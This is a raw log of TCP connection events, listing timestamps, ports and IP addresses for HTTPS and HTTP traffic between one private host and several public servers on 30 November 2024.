Nov 30, 2024 12:47:09.671355963 CET	443	49740	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:09.715658903 CET	443	49739	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:09.715925932 CET	49739	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:09.715939999 CET	443	49739	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:09.716890097 CET	443	49739	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:09.716955900 CET	49739	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:09.717329025 CET	49739	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:09.717385054 CET	443	49739	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:09.720845938 CET	49740	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:09.767489910 CET	49739	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:09.767502069 CET	443	49739	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:09.814017057 CET	49739	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:10.481321096 CET	443	49740	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:10.481401920 CET	443	49740	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:10.481466055 CET	49740	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:10.676619053 CET	49740	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:10.676651955 CET	443	49740	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:10.716856003 CET	49739	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:10.759324074 CET	443	49739	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:11.410944939 CET	443	49739	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:11.410979986 CET	443	49739	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:11.411016941 CET	49739	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:11.411022902 CET	443	49739	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:11.411032915 CET	443	49739	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:11.411072016 CET	49739	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:11.411077023 CET	443	49739	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:11.411113977 CET	49739	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:11.414405107 CET	49739	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:11.414423943 CET	443	49739	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:11.424031019 CET	49742	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:47:11.424052000 CET	443	49742	142.250.181.100	192.168.2.4
Nov 30, 2024 12:47:11.424108028 CET	49742	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:47:11.424391985 CET	49742	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:47:11.424407005 CET	443	49742	142.250.181.100	192.168.2.4
Nov 30, 2024 12:47:11.636624098 CET	49743	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:11.636674881 CET	443	49743	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:11.636773109 CET	49743	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:11.644315958 CET	49743	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:11.644330025 CET	443	49743	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:11.681752920 CET	49744	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:11.681793928 CET	443	49744	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:11.681977034 CET	49744	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:11.684863091 CET	49744	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:11.684881926 CET	443	49744	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:12.900573969 CET	443	49743	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:12.900996923 CET	49743	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:12.901022911 CET	443	49743	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:12.902046919 CET	443	49743	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:12.902108908 CET	49743	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:12.902642012 CET	49743	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:12.902657032 CET	49743	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:12.902709961 CET	443	49743	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:12.902715921 CET	49743	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:12.902755976 CET	49743	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:12.903326988 CET	49745	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:12.903347969 CET	443	49745	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:12.903414011 CET	49745	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:12.903764963 CET	49745	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:12.903779984 CET	443	49745	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:13.116549015 CET	443	49744	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:13.116620064 CET	49744	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:13.149144888 CET	49744	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:13.149187088 CET	443	49744	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:13.149463892 CET	443	49744	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:13.166623116 CET	443	49742	142.250.181.100	192.168.2.4
Nov 30, 2024 12:47:13.203388929 CET	49744	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:13.219131947 CET	49742	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:47:13.223242998 CET	49742	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:47:13.223252058 CET	443	49742	142.250.181.100	192.168.2.4
Nov 30, 2024 12:47:13.224278927 CET	443	49742	142.250.181.100	192.168.2.4
Nov 30, 2024 12:47:13.224292040 CET	443	49742	142.250.181.100	192.168.2.4
Nov 30, 2024 12:47:13.224344015 CET	49742	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:47:13.243998051 CET	49742	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:47:13.244106054 CET	443	49742	142.250.181.100	192.168.2.4
Nov 30, 2024 12:47:13.283488989 CET	49744	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:13.297091007 CET	49742	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:47:13.297101974 CET	443	49742	142.250.181.100	192.168.2.4
Nov 30, 2024 12:47:13.327343941 CET	443	49744	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:13.339719057 CET	49742	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:47:13.713763952 CET	443	49744	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:13.713834047 CET	443	49744	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:13.714037895 CET	49744	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:13.714037895 CET	49744	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:13.714097023 CET	443	49744	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:13.714133024 CET	49744	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:13.714153051 CET	443	49744	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:13.754647017 CET	49746	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:13.754693031 CET	443	49746	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:13.754935980 CET	49746	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:13.755218029 CET	49746	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:13.755247116 CET	443	49746	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:14.161133051 CET	443	49745	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:14.161391020 CET	49745	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:14.161405087 CET	443	49745	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:14.162401915 CET	443	49745	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:14.162463903 CET	49745	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:14.162822008 CET	49745	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:14.162883043 CET	443	49745	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:14.163047075 CET	49745	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:14.163054943 CET	443	49745	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:14.203356981 CET	49745	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:14.615662098 CET	443	49745	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:14.615714073 CET	443	49745	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:14.615756989 CET	49745	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:14.615767956 CET	443	49745	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:14.615837097 CET	443	49745	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:14.616027117 CET	49745	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:14.617291927 CET	49745	443	192.168.2.4	172.67.167.249
Nov 30, 2024 12:47:14.617302895 CET	443	49745	172.67.167.249	192.168.2.4
Nov 30, 2024 12:47:15.225421906 CET	443	49746	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:15.225512028 CET	49746	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:15.227291107 CET	49746	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:15.227308989 CET	443	49746	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:15.227560997 CET	443	49746	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:15.228831053 CET	49746	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:15.271347046 CET	443	49746	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:15.582602978 CET	49747	443	192.168.2.4	172.202.163.200
Nov 30, 2024 12:47:15.582623005 CET	443	49747	172.202.163.200	192.168.2.4
Nov 30, 2024 12:47:15.582808018 CET	49747	443	192.168.2.4	172.202.163.200
Nov 30, 2024 12:47:15.584300995 CET	49747	443	192.168.2.4	172.202.163.200
Nov 30, 2024 12:47:15.584315062 CET	443	49747	172.202.163.200	192.168.2.4
Nov 30, 2024 12:47:15.763350964 CET	443	49746	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:15.763427973 CET	443	49746	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:15.763926983 CET	49746	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:15.788351059 CET	49746	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:15.788400888 CET	443	49746	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:15.788430929 CET	49746	443	192.168.2.4	23.218.208.109
Nov 30, 2024 12:47:15.788448095 CET	443	49746	23.218.208.109	192.168.2.4
Nov 30, 2024 12:47:17.307399035 CET	443	49747	172.202.163.200	192.168.2.4
Nov 30, 2024 12:47:17.307467937 CET	49747	443	192.168.2.4	172.202.163.200
Nov 30, 2024 12:47:17.314165115 CET	49747	443	192.168.2.4	172.202.163.200
Nov 30, 2024 12:47:17.314174891 CET	443	49747	172.202.163.200	192.168.2.4
Nov 30, 2024 12:47:17.314439058 CET	443	49747	172.202.163.200	192.168.2.4
Nov 30, 2024 12:47:17.359566927 CET	49747	443	192.168.2.4	172.202.163.200
Nov 30, 2024 12:47:18.796000004 CET	49747	443	192.168.2.4	172.202.163.200
Nov 30, 2024 12:47:18.839371920 CET	443	49747	172.202.163.200	192.168.2.4
Nov 30, 2024 12:47:19.367014885 CET	443	49747	172.202.163.200	192.168.2.4
Nov 30, 2024 12:47:19.367043018 CET	443	49747	172.202.163.200	192.168.2.4
Nov 30, 2024 12:47:19.367049932 CET	443	49747	172.202.163.200	192.168.2.4
Nov 30, 2024 12:47:19.367125988 CET	49747	443	192.168.2.4	172.202.163.200
Nov 30, 2024 12:47:19.367125988 CET	443	49747	172.202.163.200	192.168.2.4
Nov 30, 2024 12:47:19.367160082 CET	443	49747	172.202.163.200	192.168.2.4
Nov 30, 2024 12:47:19.367170095 CET	443	49747	172.202.163.200	192.168.2.4
Nov 30, 2024 12:47:19.367182016 CET	49747	443	192.168.2.4	172.202.163.200
Nov 30, 2024 12:47:19.367194891 CET	49747	443	192.168.2.4	172.202.163.200
Nov 30, 2024 12:47:19.367218018 CET	49747	443	192.168.2.4	172.202.163.200
Nov 30, 2024 12:47:19.389357090 CET	443	49747	172.202.163.200	192.168.2.4
Nov 30, 2024 12:47:19.389444113 CET	49747	443	192.168.2.4	172.202.163.200
Nov 30, 2024 12:47:19.389446020 CET	443	49747	172.202.163.200	192.168.2.4
Nov 30, 2024 12:47:19.389488935 CET	49747	443	192.168.2.4	172.202.163.200
Nov 30, 2024 12:47:20.890191078 CET	49747	443	192.168.2.4	172.202.163.200
Nov 30, 2024 12:47:20.890206099 CET	443	49747	172.202.163.200	192.168.2.4
Nov 30, 2024 12:47:20.890219927 CET	49747	443	192.168.2.4	172.202.163.200
Nov 30, 2024 12:47:20.890224934 CET	443	49747	172.202.163.200	192.168.2.4
Nov 30, 2024 12:47:22.850013018 CET	443	49742	142.250.181.100	192.168.2.4
Nov 30, 2024 12:47:22.850065947 CET	443	49742	142.250.181.100	192.168.2.4
Nov 30, 2024 12:47:22.850222111 CET	49742	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:47:23.046277046 CET	49723	80	192.168.2.4	2.20.68.201
Nov 30, 2024 12:47:23.158193111 CET	49742	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:47:23.158207893 CET	443	49742	142.250.181.100	192.168.2.4
Nov 30, 2024 12:47:23.167355061 CET	80	49723	2.20.68.201	192.168.2.4
Nov 30, 2024 12:47:23.167426109 CET	49723	80	192.168.2.4	2.20.68.201
Nov 30, 2024 12:47:57.280383110 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:57.280405045 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:57.280503035 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:57.280807018 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:57.280821085 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:57.406759024 CET	49754	443	192.168.2.4	20.12.23.50
Nov 30, 2024 12:47:57.406804085 CET	443	49754	20.12.23.50	192.168.2.4
Nov 30, 2024 12:47:57.406877041 CET	49754	443	192.168.2.4	20.12.23.50
Nov 30, 2024 12:47:57.407217026 CET	49754	443	192.168.2.4	20.12.23.50
Nov 30, 2024 12:47:57.407227993 CET	443	49754	20.12.23.50	192.168.2.4
Nov 30, 2024 12:47:59.027820110 CET	443	49754	20.12.23.50	192.168.2.4
Nov 30, 2024 12:47:59.027915001 CET	49754	443	192.168.2.4	20.12.23.50
Nov 30, 2024 12:47:59.032278061 CET	49754	443	192.168.2.4	20.12.23.50
Nov 30, 2024 12:47:59.032288074 CET	443	49754	20.12.23.50	192.168.2.4
Nov 30, 2024 12:47:59.032516956 CET	443	49754	20.12.23.50	192.168.2.4
Nov 30, 2024 12:47:59.040817022 CET	49754	443	192.168.2.4	20.12.23.50
Nov 30, 2024 12:47:59.063882113 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.063977003 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.065411091 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.065422058 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.065660954 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.074378967 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.087337017 CET	443	49754	20.12.23.50	192.168.2.4
Nov 30, 2024 12:47:59.115339041 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.549285889 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.549307108 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.549320936 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.549407959 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.549424887 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.549474955 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.682374954 CET	443	49754	20.12.23.50	192.168.2.4
Nov 30, 2024 12:47:59.682399988 CET	443	49754	20.12.23.50	192.168.2.4
Nov 30, 2024 12:47:59.682415962 CET	443	49754	20.12.23.50	192.168.2.4
Nov 30, 2024 12:47:59.682493925 CET	49754	443	192.168.2.4	20.12.23.50
Nov 30, 2024 12:47:59.682513952 CET	443	49754	20.12.23.50	192.168.2.4
Nov 30, 2024 12:47:59.682560921 CET	49754	443	192.168.2.4	20.12.23.50
Nov 30, 2024 12:47:59.722652912 CET	443	49754	20.12.23.50	192.168.2.4
Nov 30, 2024 12:47:59.722697020 CET	443	49754	20.12.23.50	192.168.2.4
Nov 30, 2024 12:47:59.722739935 CET	443	49754	20.12.23.50	192.168.2.4
Nov 30, 2024 12:47:59.722806931 CET	49754	443	192.168.2.4	20.12.23.50
Nov 30, 2024 12:47:59.722917080 CET	49754	443	192.168.2.4	20.12.23.50
Nov 30, 2024 12:47:59.723182917 CET	49754	443	192.168.2.4	20.12.23.50
Nov 30, 2024 12:47:59.723201990 CET	443	49754	20.12.23.50	192.168.2.4
Nov 30, 2024 12:47:59.723237038 CET	49754	443	192.168.2.4	20.12.23.50
Nov 30, 2024 12:47:59.723242998 CET	443	49754	20.12.23.50	192.168.2.4
Nov 30, 2024 12:47:59.744122028 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.744165897 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.744230032 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.744245052 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.744276047 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.744282961 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.787859917 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.787874937 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.787960052 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.787966967 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.788003922 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.925498962 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.925515890 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.925565958 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.925574064 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.925591946 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.925781965 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.964799881 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.964814901 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.964881897 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.964889050 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.964941025 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.983403921 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.983422041 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.983469009 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.983474016 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:47:59.983506918 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:47:59.983519077 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.004930019 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.004944086 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.005018950 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.005024910 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.005067110 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.119343996 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.119359016 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.119429111 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.119437933 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.119482994 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.137561083 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.137574911 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.137646914 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.137653112 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.137693882 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.152096033 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.152120113 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.152177095 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.152183056 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.152221918 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.168970108 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.168984890 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.169032097 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.169035912 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.169075966 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.184828997 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.184843063 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.184920073 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.184926033 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.184966087 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.201750994 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.201764107 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.201847076 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.201852083 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.201889038 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.206619978 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.206671953 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.206679106 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.206716061 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.206803083 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.206811905 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.206821918 CET	49753	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.206826925 CET	443	49753	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.245605946 CET	49756	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.245635033 CET	49755	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.245652914 CET	443	49755	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.245654106 CET	443	49756	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.245755911 CET	49756	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.245970964 CET	49756	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.245973110 CET	49755	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.245985031 CET	443	49756	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.246068001 CET	49755	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.246079922 CET	443	49755	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.247450113 CET	49757	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.247536898 CET	443	49757	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.247598886 CET	49757	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.247801065 CET	49757	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.247838020 CET	443	49757	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.248657942 CET	49758	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.248667955 CET	443	49758	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.248718023 CET	49758	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.249303102 CET	49759	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.249325991 CET	443	49759	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.249391079 CET	49759	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.249434948 CET	49758	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.249445915 CET	443	49758	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:00.249536991 CET	49759	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:00.249561071 CET	443	49759	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:01.962522984 CET	443	49755	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:01.966368914 CET	49755	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:01.966396093 CET	443	49755	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:01.966866016 CET	49755	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:01.966871977 CET	443	49755	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.003607988 CET	443	49756	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.005203009 CET	49756	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.005229950 CET	443	49756	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.008537054 CET	49756	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.008543015 CET	443	49756	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.030883074 CET	443	49757	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.031627893 CET	49757	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.031647921 CET	443	49757	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.032011032 CET	49757	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.032016993 CET	443	49757	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.033451080 CET	443	49759	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.039176941 CET	49759	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.039205074 CET	443	49759	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.043205976 CET	49759	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.043216944 CET	443	49759	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.093569040 CET	443	49758	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.095065117 CET	49758	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.095088005 CET	443	49758	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.095999002 CET	49758	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.096007109 CET	443	49758	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.403541088 CET	443	49755	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.403567076 CET	443	49755	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.403635025 CET	49755	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.403650999 CET	443	49755	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.403693914 CET	49755	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.403872013 CET	49755	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.403877020 CET	443	49755	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.403889894 CET	49755	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.404030085 CET	443	49755	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.404058933 CET	443	49755	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.404097080 CET	49755	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.406434059 CET	49760	443	192.168.2.4	13.107.246.63
